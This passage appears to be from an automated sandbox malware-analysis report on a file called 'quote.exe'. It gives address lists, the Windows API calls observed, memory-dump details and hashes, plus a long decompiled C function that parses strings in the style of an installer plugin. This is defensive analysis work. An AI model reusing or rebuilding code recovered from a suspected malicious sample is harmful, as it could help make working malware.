                                                                                      0x00404a8c
                                                                                      0x00404aa8
                                                                                      0x00000000
                                                                                      0x00404aaa
                                                                                      0x00404aad
                                                                                      0x00404abb
                                                                                      0x00404ac1
                                                                                      0x00404ac2
                                                                                      0x00404ac5
                                                                                      0x00404ac8
                                                                                      0x00000000
                                                                                      0x00404ac8
                                                                                      0x00404a3f
                                                                                      0x00404a41
                                                                                      0x00404a45
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a47
                                                                                      0x00404a47
                                                                                      0x00404a54
                                                                                      0x00404a59
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a5d
                                                                                      0x00404a5f
                                                                                      0x00404a5f
                                                                                      0x00404a68
                                                                                      0x00404a6a
                                                                                      0x00404a6f
                                                                                      0x00404a72
                                                                                      0x00404a77
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a77
                                                                                      0x00404ad4
                                                                                      0x00404ade
                                                                                      0x00404ae1
                                                                                      0x00404ae4
                                                                                      0x00404aeb
                                                                                      0x00404aeb
                                                                                      0x00404aed
                                                                                      0x00404aed
                                                                                      0x00404af2
                                                                                      0x00404af4
                                                                                      0x00404afc
                                                                                      0x00404b03
                                                                                      0x00404b05
                                                                                      0x00404b10
                                                                                      0x00404b10
                                                                                      0x00404b05
                                                                                      0x00404b17
                                                                                      0x00404b20
                                                                                      0x00404b2a
                                                                                      0x00404b32
                                                                                      0x00404b4d
                                                                                      0x00404b34
                                                                                      0x00404b3d
                                                                                      0x00404b3d
                                                                                      0x00404b32
                                                                                      0x00404b52
                                                                                      0x00404b57
                                                                                      0x00404b5c
                                                                                      0x00404b65
                                                                                      0x00404b65
                                                                                      0x00404b6e
                                                                                      0x00404b70
                                                                                      0x00404b70
                                                                                      0x00404b7c
                                                                                      0x00404b84
                                                                                      0x00404b8e
                                                                                      0x00404b8e
                                                                                      0x00404b93
                                                                                      0x00000000
                                                                                      0x00404b93
                                                                                      0x00404a3d
                                                                                      0x004049f4
                                                                                      0x004049fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004049fb
                                                                                      0x0040491a
                                                                                      0x00404923
                                                                                      0x0040493d
                                                                                      0x00404942
                                                                                      0x0040494c
                                                                                      0x00404953
                                                                                      0x0040495f
                                                                                      0x00404962
                                                                                      0x00404965
                                                                                      0x0040496c
                                                                                      0x00404974
                                                                                      0x00404977
                                                                                      0x0040497b
                                                                                      0x00404982
                                                                                      0x0040498a
                                                                                      0x004049e4
                                                                                      0x0040498c
                                                                                      0x0040498d
                                                                                      0x00404994
                                                                                      0x0040499e
                                                                                      0x004049a6
                                                                                      0x004049b3
                                                                                      0x004049c7
                                                                                      0x004049cb
                                                                                      0x004049cb
                                                                                      0x004049c7
                                                                                      0x004049d0
                                                                                      0x004049dd
                                                                                      0x004049dd
                                                                                      0x0040498a
                                                                                      0x00000000
                                                                                      0x00404942
                                                                                      0x00404930
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404936
                                                                                      0x00000000
                                                                                      0x004048a1
                                                                                      0x004048ae
                                                                                      0x004048b7
                                                                                      0x004048c4
                                                                                      0x004048c4
                                                                                      0x004048cb
                                                                                      0x004048d1
                                                                                      0x004048da
                                                                                      0x004048dd
                                                                                      0x004048e0
                                                                                      0x004048e8
                                                                                      0x004048eb
                                                                                      0x004048ee
                                                                                      0x004048f4
                                                                                      0x004048fb
                                                                                      0x00404902
                                                                                      0x00404b99
                                                                                      0x00404bab
                                                                                      0x00404908
                                                                                      0x0040490b
                                                                                      0x00000000
                                                                                      0x0040490b
                                                                                      0x00404902

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004048A7
                                                                                      • SetWindowTextW.USER32(00000000,-00436000), ref: 004048D1
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404982
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040498D
                                                                                      • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 004049BF
                                                                                      • lstrcatW.KERNEL32(-00436000,Call), ref: 004049CB
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 004049DD
                                                                                        • Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E
                                                                                        • Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                                        • Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                                        • Part of subcall function 004066C0: CharNextW.USER32(?,00000000,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                                        • Part of subcall function 004066C0: CharPrevW.USER32(?,?,75A33420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\quote.exe" ,004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404AA0
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB
                                                                                        • Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404CB5
                                                                                        • Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
                                                                                        • Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$Call$j&l
                                                                                      • API String ID: 2624150263-1964372676
                                                                                      • Opcode ID: a29f11494786f4983dde6a8903936fd5a0c5e75438e421a64f0c20d1c4fa2cb5
                                                                                      • Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
                                                                                      • Opcode Fuzzy Hash: a29f11494786f4983dde6a8903936fd5a0c5e75438e421a64f0c20d1c4fa2cb5
                                                                                      • Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 95%
                                                                                      			E6F491B5F() {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				WCHAR* _v24;
                                                                                      				WCHAR* _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				WCHAR* _v48;
                                                                                      				signed int _v52;
                                                                                      				void* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				WCHAR* _t208;
                                                                                      				signed int _t211;
                                                                                      				void* _t213;
                                                                                      				void* _t215;
                                                                                      				WCHAR* _t217;
                                                                                      				void* _t225;
                                                                                      				struct HINSTANCE__* _t226;
                                                                                      				struct HINSTANCE__* _t227;
                                                                                      				struct HINSTANCE__* _t229;
                                                                                      				signed short _t231;
                                                                                      				struct HINSTANCE__* _t234;
                                                                                      				struct HINSTANCE__* _t236;
                                                                                      				void* _t237;
                                                                                      				intOrPtr* _t238;
                                                                                      				void* _t249;
                                                                                      				signed char _t250;
                                                                                      				signed int _t251;
                                                                                      				struct HINSTANCE__* _t257;
                                                                                      				void* _t258;
                                                                                      				signed int _t260;
                                                                                      				signed int _t261;
                                                                                      				signed short* _t264;
                                                                                      				signed int _t269;
                                                                                      				signed int _t272;
                                                                                      				signed int _t274;
                                                                                      				void* _t277;
                                                                                      				void* _t281;
                                                                                      				struct HINSTANCE__* _t283;
                                                                                      				signed int _t286;
                                                                                      				void _t287;
                                                                                      				signed int _t288;
                                                                                      				signed int _t300;
                                                                                      				signed int _t301;
                                                                                      				signed short _t304;
                                                                                      				void* _t305;
                                                                                      				signed int _t309;
                                                                                      				signed int _t312;
                                                                                      				signed int _t315;
                                                                                      				signed int _t316;
                                                                                      				signed int _t317;
                                                                                      				signed short* _t321;
                                                                                      				WCHAR* _t322;
                                                                                      				WCHAR* _t324;
                                                                                      				WCHAR* _t325;
                                                                                      				struct HINSTANCE__* _t326;
                                                                                      				void* _t328;
                                                                                      				signed int _t331;
                                                                                      				void* _t332;
                                                                                      
                                                                                      				_t283 = 0;
                                                                                      				_v32 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v16 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_t332 = 0;
                                                                                      				_v52 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_t208 = E6F49121B();
                                                                                      				_v24 = _t208;
                                                                                      				_v28 = _t208;
                                                                                      				_v48 = E6F49121B();
                                                                                      				_t321 = E6F491243();
                                                                                      				_v56 = _t321;
                                                                                      				_v12 = _t321;
                                                                                      				while(1) {
                                                                                      					_t211 = _v32;
                                                                                      					_v60 = _t211;
                                                                                      					if(_t211 != _t283 && _t332 == _t283) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t286 =  *_t321 & 0x0000ffff;
                                                                                      					_t213 = _t286 - _t283;
                                                                                      					if(_t213 == 0) {
                                                                                      						_t37 =  &_v32;
                                                                                      						 *_t37 = _v32 | 0xffffffff;
                                                                                      						__eflags =  *_t37;
                                                                                      						L20:
                                                                                      						_t215 = _v60 - _t283;
                                                                                      						if(_t215 == 0) {
                                                                                      							__eflags = _t332 - _t283;
                                                                                      							 *_v28 = _t283;
                                                                                      							if(_t332 == _t283) {
                                                                                      								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                                                      								 *(_t332 + 0x1010) = _t283;
                                                                                      								 *(_t332 + 0x1014) = _t283;
                                                                                      							}
                                                                                      							_t287 = _v36;
                                                                                      							_t47 = _t332 + 8; // 0x8
                                                                                      							_t217 = _t47;
                                                                                      							_t48 = _t332 + 0x808; // 0x808
                                                                                      							_t322 = _t48;
                                                                                      							 *_t332 = _t287;
                                                                                      							_t288 = _t287 - _t283;
                                                                                      							__eflags = _t288;
                                                                                      							 *_t217 = _t283;
                                                                                      							 *_t322 = _t283;
                                                                                      							 *(_t332 + 0x1008) = _t283;
                                                                                      							 *(_t332 + 0x100c) = _t283;
                                                                                      							 *(_t332 + 4) = _t283;
                                                                                      							if(_t288 == 0) {
                                                                                      								__eflags = _v28 - _v24;
                                                                                      								if(_v28 == _v24) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t328 = 0;
                                                                                      								GlobalFree(_t332);
                                                                                      								_t332 = E6F491311(_v24);
                                                                                      								__eflags = _t332 - _t283;
                                                                                      								if(_t332 == _t283) {
                                                                                      									goto L42;
                                                                                      								} else {
                                                                                      									goto L35;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L35:
                                                                                      									_t249 =  *(_t332 + 0x1ca0);
                                                                                      									__eflags = _t249 - _t283;
                                                                                      									if(_t249 == _t283) {
                                                                                      										break;
                                                                                      									}
                                                                                      									_t328 = _t332;
                                                                                      									_t332 = _t249;
                                                                                      									__eflags = _t332 - _t283;
                                                                                      									if(_t332 != _t283) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									break;
                                                                                      								}
                                                                                      								__eflags = _t328 - _t283;
                                                                                      								if(_t328 != _t283) {
                                                                                      									 *(_t328 + 0x1ca0) = _t283;
                                                                                      								}
                                                                                      								_t250 =  *(_t332 + 0x1010);
                                                                                      								__eflags = _t250 & 0x00000008;
                                                                                      								if((_t250 & 0x00000008) == 0) {
                                                                                      									_t251 = _t250 | 0x00000002;
                                                                                      									__eflags = _t251;
                                                                                      									 *(_t332 + 0x1010) = _t251;
                                                                                      								} else {
                                                                                      									_t332 = E6F49158F(_t332);
                                                                                      									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                      								}
                                                                                      								goto L42;
                                                                                      							} else {
                                                                                      								_t300 = _t288 - 1;
                                                                                      								__eflags = _t300;
                                                                                      								if(_t300 == 0) {
                                                                                      									L31:
                                                                                      									lstrcpyW(_t217, _v48);
                                                                                      									L32:
                                                                                      									lstrcpyW(_t322, _v24);
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t301 = _t300 - 1;
                                                                                      								__eflags = _t301;
                                                                                      								if(_t301 == 0) {
                                                                                      									goto L32;
                                                                                      								}
                                                                                      								__eflags = _t301 != 1;
                                                                                      								if(_t301 != 1) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								goto L31;
                                                                                      							}
                                                                                      						} else {
                                                                                      							if(_t215 == 1) {
                                                                                      								_t257 = _v16;
                                                                                      								if(_v40 == _t283) {
                                                                                      									_t257 = _t257 - 1;
                                                                                      								}
                                                                                      								 *(_t332 + 0x1014) = _t257;
                                                                                      							}
                                                                                      							L42:
                                                                                      							_v12 = _v12 + 2;
                                                                                      							_v28 = _v24;
                                                                                      							L59:
                                                                                      							if(_v32 != 0xffffffff) {
                                                                                      								_t321 = _v12;
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      					}
                                                                                      					_t258 = _t213 - 0x23;
                                                                                      					if(_t258 == 0) {
                                                                                      						__eflags = _t321 - _v56;
                                                                                      						if(_t321 <= _v56) {
                                                                                      							L17:
                                                                                      							__eflags = _v44 - _t283;
                                                                                      							if(_v44 != _t283) {
                                                                                      								L43:
                                                                                      								_t260 = _v32 - _t283;
                                                                                      								__eflags = _t260;
                                                                                      								if(_t260 == 0) {
                                                                                      									_t261 = _t286;
                                                                                      									while(1) {
                                                                                      										__eflags = _t261 - 0x22;
                                                                                      										if(_t261 != 0x22) {
                                                                                      											break;
                                                                                      										}
                                                                                      										_t321 =  &(_t321[1]);
                                                                                      										__eflags = _v44 - _t283;
                                                                                      										_v12 = _t321;
                                                                                      										if(_v44 == _t283) {
                                                                                      											_v44 = 1;
                                                                                      											L162:
                                                                                      											_v28 =  &(_v28[0]);
                                                                                      											 *_v28 =  *_t321;
                                                                                      											L58:
                                                                                      											_t331 =  &(_t321[1]);
                                                                                      											__eflags = _t331;
                                                                                      											_v12 = _t331;
                                                                                      											goto L59;
                                                                                      										}
                                                                                      										_t261 =  *_t321 & 0x0000ffff;
                                                                                      										_v44 = _t283;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2a;
                                                                                      									if(_t261 == 0x2a) {
                                                                                      										_v36 = 2;
                                                                                      										L57:
                                                                                      										_t321 = _v12;
                                                                                      										_v28 = _v24;
                                                                                      										_t283 = 0;
                                                                                      										__eflags = 0;
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2d;
                                                                                      									if(_t261 == 0x2d) {
                                                                                      										L151:
                                                                                      										_t304 =  *_t321;
                                                                                      										__eflags = _t304 - 0x2d;
                                                                                      										if(_t304 != 0x2d) {
                                                                                      											L154:
                                                                                      											_t264 =  &(_t321[1]);
                                                                                      											__eflags =  *_t264 - 0x3a;
                                                                                      											if( *_t264 != 0x3a) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											__eflags = _t304 - 0x2d;
                                                                                      											if(_t304 == 0x2d) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											_v36 = 1;
                                                                                      											L157:
                                                                                      											_v12 = _t264;
                                                                                      											__eflags = _v28 - _v24;
                                                                                      											if(_v28 <= _v24) {
                                                                                      												 *_v48 = _t283;
                                                                                      											} else {
                                                                                      												 *_v28 = _t283;
                                                                                      												lstrcpyW(_v48, _v24);
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										}
                                                                                      										_t264 =  &(_t321[1]);
                                                                                      										__eflags =  *_t264 - 0x3e;
                                                                                      										if( *_t264 != 0x3e) {
                                                                                      											goto L154;
                                                                                      										}
                                                                                      										_v36 = 3;
                                                                                      										goto L157;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x3a;
                                                                                      									if(_t261 != 0x3a) {
                                                                                      										goto L162;
                                                                                      									}
                                                                                      									goto L151;
                                                                                      								}
                                                                                      								_t269 = _t260 - 1;
                                                                                      								__eflags = _t269;
                                                                                      								if(_t269 == 0) {
                                                                                      									L80:
                                                                                      									_t305 = _t286 + 0xffffffde;
                                                                                      									__eflags = _t305 - 0x55;
                                                                                      									if(_t305 > 0x55) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(( *(_t305 + 0x6f492348) & 0x000000ff) * 4 +  &M6F4922BC))) {
                                                                                      										case 0:
                                                                                      											__ecx = _v24;
                                                                                      											__edi = _v12;
                                                                                      											while(1) {
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												L131:
                                                                                      												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                      												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                      													L136:
                                                                                      													 *__ecx =  *__ecx & 0x00000000;
                                                                                      													__eax = E6F49122C(_v24);
                                                                                      													__ebx = __eax;
                                                                                      													goto L97;
                                                                                      												}
                                                                                      												L132:
                                                                                      												__eflags = __ax;
                                                                                      												if(__ax == 0) {
                                                                                      													goto L136;
                                                                                      												}
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax == __dx) {
                                                                                      													__edi = __edi + 1;
                                                                                      													__edi = __edi + 1;
                                                                                      													__eflags = __edi;
                                                                                      												}
                                                                                      												__ax =  *__edi;
                                                                                      												 *__ecx =  *__edi;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												goto L131;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											_v8 = 1;
                                                                                      											goto L57;
                                                                                      										case 2:
                                                                                      											_v8 = _v8 | 0xffffffff;
                                                                                      											goto L57;
                                                                                      										case 3:
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v16 = _v16 + 1;
                                                                                      											goto L85;
                                                                                      										case 4:
                                                                                      											__eflags = _v20;
                                                                                      											if(_v20 != 0) {
                                                                                      												goto L57;
                                                                                      											}
                                                                                      											_v12 = _v12 - 2;
                                                                                      											__ebx = E6F49121B();
                                                                                      											 &_v12 = E6F491AE6( &_v12);
                                                                                      											__eax = E6F491470(__edx, __eax, __edx, __ebx);
                                                                                      											goto L97;
                                                                                      										case 5:
                                                                                      											L105:
                                                                                      											_v20 = _v20 + 1;
                                                                                      											goto L57;
                                                                                      										case 6:
                                                                                      											_push(7);
                                                                                      											goto L123;
                                                                                      										case 7:
                                                                                      											_push(0x19);
                                                                                      											goto L143;
                                                                                      										case 8:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L107;
                                                                                      										case 9:
                                                                                      											_push(0x15);
                                                                                      											goto L143;
                                                                                      										case 0xa:
                                                                                      											_push(0x16);
                                                                                      											goto L143;
                                                                                      										case 0xb:
                                                                                      											_push(0x18);
                                                                                      											goto L143;
                                                                                      										case 0xc:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L118;
                                                                                      										case 0xd:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L109;
                                                                                      										case 0xe:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L111;
                                                                                      										case 0xf:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L122;
                                                                                      										case 0x10:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L113;
                                                                                      										case 0x11:
                                                                                      											_push(3);
                                                                                      											goto L123;
                                                                                      										case 0x12:
                                                                                      											_push(0x17);
                                                                                      											L143:
                                                                                      											_pop(__ebx);
                                                                                      											goto L98;
                                                                                      										case 0x13:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E6F491AE6( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											__eflags = __ebx - 0xb;
                                                                                      											if(__ebx < 0xb) {
                                                                                      												__ebx = __ebx + 0xa;
                                                                                      											}
                                                                                      											goto L97;
                                                                                      										case 0x14:
                                                                                      											__ebx = 0xffffffff;
                                                                                      											goto L98;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L116;
                                                                                      										case 0x16:
                                                                                      											__ecx = 0;
                                                                                      											__eflags = 0;
                                                                                      											goto L91;
                                                                                      										case 0x17:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L120;
                                                                                      										case 0x18:
                                                                                      											_t271 =  *(_t332 + 0x1014);
                                                                                      											__eflags = _t271 - _v16;
                                                                                      											if(_t271 > _v16) {
                                                                                      												_v16 = _t271;
                                                                                      											}
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                      											if(_t271 != _v36 == 3) {
                                                                                      												L85:
                                                                                      												_v40 = 1;
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										case 0x19:
                                                                                      											L107:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 2;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1a:
                                                                                      											L118:
                                                                                      											_push(5);
                                                                                      											goto L123;
                                                                                      										case 0x1b:
                                                                                      											L109:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 3;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1c:
                                                                                      											L111:
                                                                                      											__ecx = 0;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1d:
                                                                                      											L122:
                                                                                      											_push(6);
                                                                                      											goto L123;
                                                                                      										case 0x1e:
                                                                                      											L113:
                                                                                      											_push(2);
                                                                                      											goto L123;
                                                                                      										case 0x1f:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E6F491AE6( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											goto L97;
                                                                                      										case 0x20:
                                                                                      											L116:
                                                                                      											_v52 = _v52 + 1;
                                                                                      											_push(4);
                                                                                      											_pop(__ecx);
                                                                                      											goto L91;
                                                                                      										case 0x21:
                                                                                      											L120:
                                                                                      											_push(4);
                                                                                      											L123:
                                                                                      											_pop(__ecx);
                                                                                      											L91:
                                                                                      											__edi = _v16;
                                                                                      											__edx =  *(0x6f49405c + __ecx * 4);
                                                                                      											__eax =  ~__eax;
                                                                                      											asm("sbb eax, eax");
                                                                                      											_v40 = 1;
                                                                                      											__edi = _v16 << 5;
                                                                                      											__eax = __eax & 0x00008000;
                                                                                      											__edi = (_v16 << 5) + __esi;
                                                                                      											__eax = __eax | __ecx;
                                                                                      											__eflags = _v8;
                                                                                      											 *(__edi + 0x1018) = __eax;
                                                                                      											if(_v8 < 0) {
                                                                                      												L93:
                                                                                      												__edx = 0;
                                                                                      												__edx = 1;
                                                                                      												__eflags = 1;
                                                                                      												L94:
                                                                                      												__eflags = _v8 - 1;
                                                                                      												 *(__edi + 0x1028) = __edx;
                                                                                      												if(_v8 == 1) {
                                                                                      													__eax =  &_v12;
                                                                                      													__eax = E6F491AE6( &_v12);
                                                                                      													__eax = __eax + 1;
                                                                                      													__eflags = __eax;
                                                                                      													_v8 = __eax;
                                                                                      												}
                                                                                      												__eax = _v8;
                                                                                      												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                      												_t136 = _v16 + 0x81; // 0x81
                                                                                      												_t136 = _t136 << 5;
                                                                                      												__eax = 0;
                                                                                      												__eflags = 0;
                                                                                      												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                      												L97:
                                                                                      												__eflags = __ebx;
                                                                                      												if(__ebx == 0) {
                                                                                      													goto L57;
                                                                                      												}
                                                                                      												L98:
                                                                                      												__eflags = _v20;
                                                                                      												_v40 = 1;
                                                                                      												if(_v20 != 0) {
                                                                                      													L103:
                                                                                      													__eflags = _v20 - 1;
                                                                                      													if(_v20 == 1) {
                                                                                      														__eax = _v16;
                                                                                      														__eax = _v16 << 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                      													}
                                                                                      													goto L105;
                                                                                      												}
                                                                                      												_v16 = _v16 << 5;
                                                                                      												_t144 = __esi + 0x1030; // 0x1030
                                                                                      												__edi = (_v16 << 5) + _t144;
                                                                                      												__eax =  *__edi;
                                                                                      												__eflags = __eax - 0xffffffff;
                                                                                      												if(__eax <= 0xffffffff) {
                                                                                      													L101:
                                                                                      													__eax = GlobalFree(__eax);
                                                                                      													L102:
                                                                                      													 *__edi = __ebx;
                                                                                      													goto L103;
                                                                                      												}
                                                                                      												__eflags = __eax - 0x19;
                                                                                      												if(__eax <= 0x19) {
                                                                                      													goto L102;
                                                                                      												}
                                                                                      												goto L101;
                                                                                      											}
                                                                                      											__eflags = __edx;
                                                                                      											if(__edx > 0) {
                                                                                      												goto L94;
                                                                                      											}
                                                                                      											goto L93;
                                                                                      										case 0x22:
                                                                                      											goto L57;
                                                                                      									}
                                                                                      								}
                                                                                      								_t272 = _t269 - 1;
                                                                                      								__eflags = _t272;
                                                                                      								if(_t272 == 0) {
                                                                                      									_v16 = _t283;
                                                                                      									goto L80;
                                                                                      								}
                                                                                      								__eflags = _t272 != 1;
                                                                                      								if(_t272 != 1) {
                                                                                      									goto L162;
                                                                                      								}
                                                                                      								__eflags = _t286 - 0x6e;
                                                                                      								if(__eflags > 0) {
                                                                                      									_t309 = _t286 - 0x72;
                                                                                      									__eflags = _t309;
                                                                                      									if(_t309 == 0) {
                                                                                      										_push(4);
                                                                                      										L74:
                                                                                      										_pop(_t274);
                                                                                      										L75:
                                                                                      										__eflags = _v8 - 1;
                                                                                      										if(_v8 != 1) {
                                                                                      											_t96 = _t332 + 0x1010;
                                                                                      											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                      											__eflags =  *_t96;
                                                                                      										} else {
                                                                                      											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                      										}
                                                                                      										_v8 = 1;
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_t312 = _t309 - 1;
                                                                                      									__eflags = _t312;
                                                                                      									if(_t312 == 0) {
                                                                                      										_push(0x10);
                                                                                      										goto L74;
                                                                                      									}
                                                                                      									__eflags = _t312 != 0;
                                                                                      									if(_t312 != 0) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_push(0x40);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								if(__eflags == 0) {
                                                                                      									_push(8);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								_t315 = _t286 - 0x21;
                                                                                      								__eflags = _t315;
                                                                                      								if(_t315 == 0) {
                                                                                      									_v8 =  ~_v8;
